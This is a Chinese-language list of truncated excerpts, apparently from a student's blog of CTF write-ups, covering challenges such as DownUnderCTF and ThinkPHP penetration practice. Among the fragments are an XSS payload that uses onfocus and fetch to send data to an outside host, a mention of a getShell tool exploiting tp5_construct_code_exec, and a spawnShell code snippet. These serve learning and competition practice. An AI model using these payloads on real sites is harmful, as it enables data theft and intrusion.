前言 第二天有事，没怎么写 Ruler of the Universe ${String(value).replace('"', "&quot;")} 这地方只转义第一个”,剩下的不会转义,用两个”即可闭合 "" autofocus onfocus="fetch('<https://xx/?'>

前言 先来看一道题（DownUnderCTF 2025），题目只给了一个dockerfile FROM alpine:latest AS flag-builder ​ WORKDIR /build RUN apk add gcc musl-dev RUN cat <<EOF > getflag.c

前言 时间充裕，所以输出还行 整体题目难的很难，简单的又挺简单 Sweet Treat admin/review这里没过滤，只要设置profile为payload <div class="profile-card"> <h4>Username:

前言 想着要学渗透了。学了点前置知识就来打了，结果中途在配置代理，网络上面花了好久 而且春秋云镜的靶场。。。好贵 记录 扫端口 22 80 25 110 80进去是一共登录页，扫出来是think php，直接拿一把梭工具getShell [+] 目标存在tp5_construct_code_exec

前言 终于放假了，有了较为充分的时间打比赛，写的题目数量也比之前多点 best_profile 先看源码 @app.route("/get_last_ip/<string:username>", methods=["GET", "POST"]) def route_check_ip(username

BpfBox func spawnShell(ctx context.Context) error { withTimeout, cancel := context.WithTimeout(ctx, time.Minute) defer cancel() cmd := exec.Comman

前言 时间好快，不知不觉大一就要结束了。想着写篇总结吧，为大一生活划上句号，于是有了这篇文章。 也不完全是CTF相关，更多的是对整个大一生活的记录与总结吧 8月 开学了（22号），怀着懵懂与无知，踏上大学生活 看着手里的综合测评细则，想着保研似乎好难，好像要参加好多活动，成绩还要很好才行 带着这样的

Starboard @app.route('/', methods=['GET']) def index(): order = request.args.get('order', 'DESC') if ';' in order or ',' in order: ret

前言 平时用的台式机，这次用笔记本发现很多工具和环境没有，加上没怎么准备，打的很烂（毕竟我一个web手咋写全方向题嘛） 太惨淡了，wp仅供参考 log 查看日志，注意到 [Unit] Description=System Backdoor Service (Disguised) After=netw

两道小web题的wp Qoutes App 这里的new URL 在quoteid为伪协议加路径时就会直接使用其构造url 而fetch是支持data伪协议的，所以直接